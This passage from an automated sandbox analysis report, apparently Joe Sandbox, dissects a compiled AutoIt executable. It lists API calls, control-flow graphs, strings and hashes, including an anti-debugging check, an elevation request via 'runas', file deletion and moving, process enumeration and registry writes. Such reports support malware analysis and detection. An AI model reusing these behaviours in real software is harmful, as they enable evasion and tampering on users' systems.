ea016b 8 API calls 100121->100126 100122 e8eb68 100127 ea019b 8 API calls 100122->100127 100123 ea016b 8 API calls 100123->100129 100124->100131 100134 e8eb1a 100126->100134 100137 e8ead9 ISource __fread_nolock 100127->100137 100128 ea016b 8 API calls 100130 e8eaa6 100128->100130 100129->100112 100129->100114 100129->100115 100129->100116 100129->100122 100129->100123 100129->100137 100130->100137 100143 e8d210 253 API calls 100130->100143 100131->100128 100131->100130 100133 ed3156 100147 ef3ef6 81 API calls __wsopen_s 100133->100147 100134->100072 100137->100117 100137->100133 100137->100134 100138 ed3131 100137->100138 100140 ed310f 100137->100140 100144 e84485 253 API calls 100137->100144 100146 ef3ef6 81 API calls __wsopen_s 100138->100146 100145 ef3ef6 81 API calls __wsopen_s 100140->100145 100142->100074 100143->100137 100144->100137 100145->100134 100146->100134 100147->100134 100148->100112 100149->100114 100150->100092 100151->100079 100152->100086 100153->100092 100154->100092 100155->100092 100156->100092 100157->100092 100158->100092

                                              Executed Functions

                                              Function 00E85D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 514 e85d78-e85de7 call e8bf07 GetVersionExW call e884b7 519 ec4f0c-ec4f1f 514->519 520 e85ded 514->520 521 ec4f20-ec4f24 519->521 522 e85def-e85df1 520->522 525 ec4f26 521->525 526 ec4f27-ec4f33 521->526 523 ec4f4b 522->523 524 e85df7-e85e56 call e896d9 call e879ed 522->524 529 ec4f52-ec4f5e 523->529 538 ec50ad-ec50b4 524->538 539 e85e5c-e85e5e 524->539 525->526 526->521 528 ec4f35-ec4f37 526->528 528->522 531 ec4f3d-ec4f44 528->531 532 e85ecc-e85ee6 GetCurrentProcess IsWow64Process 529->532 531->519 534 ec4f46 531->534 536 e85ee8 532->536 537 e85f45-e85f4b 532->537 534->523 540 e85eee-e85efa 536->540 537->540 543 ec50d4-ec50d7 538->543 544 ec50b6 538->544 541 ec4fae-ec4fc1 539->541 542 e85e64-e85e67 539->542 545 e85f00-e85f0f LoadLibraryA 540->545 546 ec50f2-ec50f6 GetSystemInfo 540->546 547 ec4fea-ec4fec 541->547 548 ec4fc3-ec4fcc 541->548 542->532 549 e85e69-e85eab 542->549 551 ec50d9-ec50e8 543->551 552 ec50c2-ec50ca 543->552 550 ec50bc 544->550 553 e85f4d-e85f57 GetSystemInfo 545->553 554 e85f11-e85f1f GetProcAddress 545->554 560 ec4fee-ec5003 547->560 561 ec5021-ec5024 547->561 557 ec4fce-ec4fd4 548->557 558 ec4fd9-ec4fe5 548->558 549->532 559 e85ead-e85eb0 549->559 550->552 551->550 562 ec50ea-ec50f0 551->562 552->543 556 e85f27-e85f29 553->556 554->553 555 e85f21-e85f25 GetNativeSystemInfo 554->555 555->556 563 e85f2b-e85f2c FreeLibrary 556->563 564 e85f32-e85f44 556->564 557->532 558->532 565 e85eb6-e85ec0 559->565 566 ec4f63-ec4f6d 559->566 567 ec5005-ec500b 560->567 568 ec5010-ec501c 560->568 569 ec505f-ec5062 561->569 570 ec5026-ec5041 561->570 562->552 563->564 565->529 576 e85ec6 565->576 573 ec4f6f-ec4f7b 566->573 574 ec4f80-ec4f8a 566->574 567->532 568->532 569->532 575 ec5068-ec508f 569->575 571 ec504e-ec505a 570->571 572 ec5043-ec5049 570->572 571->532 572->532 573->532 577 ec4f8c-ec4f98 574->577 578 ec4f9d-ec4fa9 574->578 579 ec509c-ec50a8 575->579 580 ec5091-ec5097 575->580 576->532 577->532 578->532 579->532 580->532
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00E85DA7
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              • GetCurrentProcess.KERNEL32(?,00F1DC2C,00000000,?,?), ref: 00E85ED3
                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E85EDA
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E85F05
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E85F17
                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00E85F25
                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E85F2C
                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00E85F51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                              • API String ID: 3290436268-3101561225
                                              • Opcode ID: f32c7b416ddb79693b9bf361df4a38f80e70742ba98c025a09e255d77169f14d
                                              • Instruction ID: f1aa9502fa0e46a1bd6ffdf0f4c170a17813d88336cfc15ce07cc41913004f2a
                                              • Opcode Fuzzy Hash: f32c7b416ddb79693b9bf361df4a38f80e70742ba98c025a09e255d77169f14d
                                              • Instruction Fuzzy Hash: A3A1D63390A7C8CFC755DBAC7D415D93FA46F27306B046A9CD688B3262CA294949FB31
                                              Function 00EF9F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 581 ef9f9f-ef9fc7 FindFirstFileW 582 efa03a-efa045 FindClose 581->582 583 ef9fc9-ef9fde call ea55c2 581->583 584 efa04b-efa05e FindFirstFileW 582->584 585 efa0e2 582->585 593 efa028-efa038 FindNextFileW 583->593 594 ef9fe0-ef9ff5 call ea55c2 583->594 587 efa0d9 584->587 588 efa060-efa066 584->588 589 efa0e4-efa0e8 585->589 591 efa0db-efa0dc FindClose 587->591 592 efa069-efa070 588->592 591->585 595 efa0c7-efa0d7 FindNextFileW 592->595 596 efa072-efa087 call ea55c2 592->596 593->582 593->583 594->593 601 ef9ff7-efa020 GetFileAttributesW SetFileAttributesW 594->601 595->587 595->592 596->595 602 efa089-efa09e call ea55c2 596->602 603 efa0eb-efa0f4 FindClose 601->603 604 efa026 601->604 602->595 607 efa0a0-efa0be SetCurrentDirectoryW call ef9f9f 602->607 603->589 604->593 610 efa0f6-efa0f8 607->610 611 efa0c0-efa0c5 SetCurrentDirectoryW 607->611 610->591 611->595
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,?,75918FB0,?,00000000), ref: 00EF9FC0
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00EF9FFE
                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 00EFA018
                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 00EFA030
                                              • FindClose.KERNEL32(00000000), ref: 00EFA03B
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00EFA057
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EFA0A7
                                              • SetCurrentDirectoryW.KERNEL32(00F47B94), ref: 00EFA0C5
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EFA0CF
                                              • FindClose.KERNEL32(00000000), ref: 00EFA0DC
                                              • FindClose.KERNEL32(00000000), ref: 00EFA0EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1409584000-438819550
                                              • Opcode ID: 11aafc5b1fbec77c0f74e210862f7d0faa7b61a15328f4bcc1be88dfed2be068
                                              • Instruction ID: 54f40424307cc9c4e7de4714ac794f8ddba5244d1705bcd5e7f265d39193d20c
                                              • Opcode Fuzzy Hash: 11aafc5b1fbec77c0f74e210862f7d0faa7b61a15328f4bcc1be88dfed2be068
                                              • Instruction Fuzzy Hash: 1631D57260031D6BDB10AFB4EC49AEE77BCAF09324F1480A5F919F7090DF75DA44AA52
                                              Function 00E83312 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E832EF,?), ref: 00E83342
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E832EF,?), ref: 00E83355
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F52418,00F52400,?,?,?,?,?,?,00E832EF,?), ref: 00E833C1
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                                • Part of subcall function 00E841E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E833E9,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E84227
                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E83442
                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00EC3C8A
                                              • SetCurrentDirectoryW.KERNEL32(?,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00EC3CCB
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F431F4,00F52418,?,?,?,?,?,?,?,00E832EF), ref: 00EC3D54
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EC3D5B
                                                • Part of subcall function 00E8345A: GetSysColorBrush.USER32(0000000F), ref: 00E83465
                                                • Part of subcall function 00E8345A: LoadCursorW.USER32(00000000,00007F00), ref: 00E83474
                                                • Part of subcall function 00E8345A: LoadIconW.USER32(00000063), ref: 00E8348A
                                                • Part of subcall function 00E8345A: LoadIconW.USER32(000000A4), ref: 00E8349C
                                                • Part of subcall function 00E8345A: LoadIconW.USER32(000000A2), ref: 00E834AE
                                                • Part of subcall function 00E8345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E834C6
                                                • Part of subcall function 00E8345A: RegisterClassExW.USER32(?), ref: 00E83517
                                                • Part of subcall function 00E8353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83568
                                                • Part of subcall function 00E8353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83589
                                                • Part of subcall function 00E8353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E8359D
                                                • Part of subcall function 00E8353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E835A6
                                                • Part of subcall function 00E838F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E839C3
                                              Strings
                                              • AutoIt, xrefs: 00EC3C7F
                                              • runas, xrefs: 00EC3D4F
                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00EC3C84
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                              • API String ID: 683915450-2030392706
                                              • Opcode ID: 1a79f5a1921e348f4d4c9f10123798c81d641e800bd117a7ce9746cfd25e6374
                                              • Instruction ID: 9f8cb95555462e8023188a70b378af48429d2bf862c419aca0854d1108ac8882
                                              • Opcode Fuzzy Hash: 1a79f5a1921e348f4d4c9f10123798c81d641e800bd117a7ce9746cfd25e6374
                                              • Instruction Fuzzy Hash: 5151D431108349AAC705FF70DC05DAEBBE89B92705F40652CF59D761A3DB648A4AE723
                                              Function 00EED836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1335 eed836-eed894 call e8bf07 * 3 call e8557e * 2 call eee958 call eee9c5 1350 eed89f-eed8a9 call eee9c5 1335->1350 1351 eed896-eed89a call e865a4 1335->1351 1355 eed8ab-eed8af call e865a4 1350->1355 1356 eed8b4-eed8f2 call e8bf07 * 2 call e8694e FindFirstFileW 1350->1356 1351->1350 1355->1356 1364 eed8f8 1356->1364 1365 eeda23-eeda2a FindClose 1356->1365 1367 eed8fe-eed900 1364->1367 1366 eeda2d-eeda5b call e8bd2c * 5 1365->1366 1367->1365 1369 eed906-eed90d 1367->1369 1371 eed9ef-eeda02 FindNextFileW 1369->1371 1372 eed913-eed979 call e8b25f call eedf85 call e8bd2c call e87af4 call e865a4 call eedc8e 1369->1372 1371->1367 1375 eeda08-eeda0d 1371->1375 1394 eed99f-eed9a3 1372->1394 1395 eed97b-eed97e 1372->1395 1375->1367 1398 eed9a5-eed9a8 1394->1398 1399 eed9d1-eed9d7 call eeda5c 1394->1399 1396 eed984-eed99b call e9e2e5 1395->1396 1397 eeda12-eeda21 FindClose call e8bd2c 1395->1397 1409 eed9ad-eed9b6 MoveFileW 1396->1409 1412 eed99d DeleteFileW 1396->1412 1397->1366 1403 eed9aa 1398->1403 1404 eed9b8-eed9c8 call eeda5c 1398->1404 1406 eed9dc 1399->1406 1403->1409 1404->1397 1413 eed9ca-eed9cf DeleteFileW 1404->1413 1411 eed9df-eed9e1 1406->1411 1409->1411 1411->1397 1414 eed9e3-eed9eb call e8bd2c 1411->1414 1412->1394 1413->1411 1414->1371
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                                • Part of subcall function 00EEE9C5: GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00EED8E2
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00EED99D
                                              • MoveFileW.KERNEL32(?,?), ref: 00EED9B0
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00EED9CD
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EED9F7
                                                • Part of subcall function 00EEDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00EED9DC,?,?), ref: 00EEDA72
                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00EEDA13
                                              • FindClose.KERNEL32(00000000), ref: 00EEDA24
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 1946585618-1173974218
                                              • Opcode ID: 9f3c37664641a246655a44521891f3ac5449c2637470a99ef967791dc55917b5
                                              • Instruction ID: 385b7eba6cb53e3e4d6f6d57a9fe87c81d1d71952d1ec9c90f7beaf022eaff6f
                                              • Opcode Fuzzy Hash: 9f3c37664641a246655a44521891f3ac5449c2637470a99ef967791dc55917b5
                                              • Instruction Fuzzy Hash: A9615D31C0518DAECF05FBA1DE429EDB7B5AF54304F2460A9E409B71A2EB716F0ADB50
                                              Function 00EEDB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                                • Part of subcall function 00EEE9C5: GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00EEDBE0
                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00EEDC30
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEDC41
                                              • FindClose.KERNEL32(00000000), ref: 00EEDC58
                                              • FindClose.KERNEL32(00000000), ref: 00EEDC61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: eab6d5af0e8c26182f07d5c72043e4d8a63d4b75a760cf7391037d641f7b51d9
                                              • Instruction ID: a7fcd6076b9e82102bc9c8332128fe4bcbd7a78e4504e3d99b5adf018fef5868
                                              • Opcode Fuzzy Hash: eab6d5af0e8c26182f07d5c72043e4d8a63d4b75a760cf7391037d641f7b51d9
                                              • Instruction Fuzzy Hash: 80315E3100C389AFC300FB64DC918EFB7E8BE91304F44595DF4E9A21A1EB60DA09DB52
                                              Function 00EEDC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEDCC1
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00EEDCCF
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00EEDCEF
                                              • CloseHandle.KERNELBASE(00000000), ref: 00EEDD9C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: d308c5e2a4dd448d59dcaff37920d45d608664d1c4074685ac13aeafd05d9740
                                              • Instruction ID: e8327a5307bb322cb9516123218d408e1539af74a38c95a75fe18b4c6a854e67
                                              • Opcode Fuzzy Hash: d308c5e2a4dd448d59dcaff37920d45d608664d1c4074685ac13aeafd05d9740
                                              • Instruction Fuzzy Hash: C031D671108344AFD300EF60DC81BAFBBF8AF98354F04052DF589A71A1EBB19949CB92
                                              Function 00EEE387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,00EC4686), ref: 00EEE397
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00EEE3A6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00EEE3B7
                                              • FindClose.KERNELBASE(00000000), ref: 00EEE3C3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                              • String ID:
                                              • API String ID: 2695905019-0
                                              • Opcode ID: ffd4ef0ffca2acbf6625a9e12052a1196ac459caace05d5c4056eeef19be8b4a
                                              • Instruction ID: ac46b9ff0a69a96923ffd060297e763658d1d6ffb16f2c2414b33b364ebaa30b
                                              • Opcode Fuzzy Hash: ffd4ef0ffca2acbf6625a9e12052a1196ac459caace05d5c4056eeef19be8b4a
                                              • Instruction Fuzzy Hash: 17F0E53041195867C221673CAC0E8EA77BC9E41339B119711F835D32F0D7B4DD955695
                                              Function 00EA5078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00EA504E,?,00F498D8,0000000C,00EA51A5,?,00000002,00000000), ref: 00EA5099
                                              • TerminateProcess.KERNEL32(00000000,?,00EA504E,?,00F498D8,0000000C,00EA51A5,?,00000002,00000000), ref: 00EA50A0
                                              • ExitProcess.KERNEL32 ref: 00EA50B2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 62e1618ee255adda87bba2ff1dd2bd4fa3f7698ccf288915acfe9dfc188642ef
                                              • Instruction ID: bb92d034864f6fd6fbee2d463a8e6a2f08d351ce582fb85e17d2917719bb8c40
                                              • Opcode Fuzzy Hash: 62e1618ee255adda87bba2ff1dd2bd4fa3f7698ccf288915acfe9dfc188642ef
                                              • Instruction Fuzzy Hash: E6E0B632400548AFDF216F64DD49E993BBAEB89385F019014F915AB162DB35EE42EB90
                                              Function 00EDE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00EDE60A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID: X64
                                              • API String ID: 2645101109-893830106
                                              • Opcode ID: fe2d02cf9d64b9a7c4239a51064412d80f276b412de178b78ca11b9e08c491e8
                                              • Instruction ID: fc2a42cfe381cbeb7790972e8cf9d22b630d70e9df9e30747f238f7fdf2de51e
                                              • Opcode Fuzzy Hash: fe2d02cf9d64b9a7c4239a51064412d80f276b412de178b78ca11b9e08c491e8
                                              • Instruction Fuzzy Hash: 0AD0C9B480111DEACF90CB90DC8CDDD737CBB08304F104192F206B2200DB3095499B10
                                              Function 00F0CD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 f0cd16-f0cd5a call e8bf07 * 3 7 f0cd65-f0cdd8 call e88e70 call f0d6b1 call f0d2f7 0->7 8 f0cd5c-f0cd5f 0->8 21 f0ce08-f0ce0d 7->21 22 f0cdda-f0cde8 7->22 8->7 9 f0ce64-f0ce71 call e8e650 8->9 16 f0d1ef-f0d212 call e8bd2c * 3 9->16 24 f0ce7c 21->24 25 f0ce0f-f0ce24 RegConnectRegistryW 21->25 26 f0cdea 22->26 27 f0cded-f0cdfd 22->27 34 f0ce80-f0ceab RegCreateKeyExW 24->34 30 f0ce76-f0ce7a 25->30 31 f0ce26-f0ce43 call e87ab0 25->31 26->27 32 f0ce02-f0ce06 27->32 33 f0cdff 27->33 30->34 45 f0ce45 31->45 46 f0ce48-f0ce58 31->46 37 f0ce61-f0ce63 32->37 33->32 38 f0cead-f0ceca call e87ab0 34->38 39 f0cf0e-f0cf13 34->39 37->9 49 f0cecc 38->49 50 f0cecf-f0cede 38->50 42 f0d1d6-f0d1e7 RegCloseKey 39->42 43 f0cf19-f0cf42 call e88e70 call ea4db8 39->43 42->16 47 f0d1e9-f0d1ed RegCloseKey 42->47 60 f0cf44-f0cf91 call e88e70 call ea4cf3 call e88e70 * 2 43->60 61 f0cf96-f0cfb9 call e88e70 call ea4db8 43->61 45->46 51 f0ce5a 46->51 52 f0ce5d 46->52 47->16 49->50 54 f0cee0 50->54 55 f0cee3-f0cef9 call e8e650 50->55 51->52 52->37 54->55 55->16 63 f0ceff-f0cf09 RegCloseKey 55->63 84 f0d2bb-f0d2c7 RegSetValueExW 60->84 72 f0d047-f0d06a call e88e70 call ea4db8 61->72 73 f0cfbf-f0d019 call e88e70 call ea4cf3 call e88e70 * 2 RegSetValueExW 61->73 63->16 86 f0d070-f0d0d6 call e88e70 call ea019b call e88e70 call e8605e 72->86 87 f0d156-f0d179 call e88e70 call ea4db8 72->87 73->42 103 f0d01f-f0d042 call e87ab0 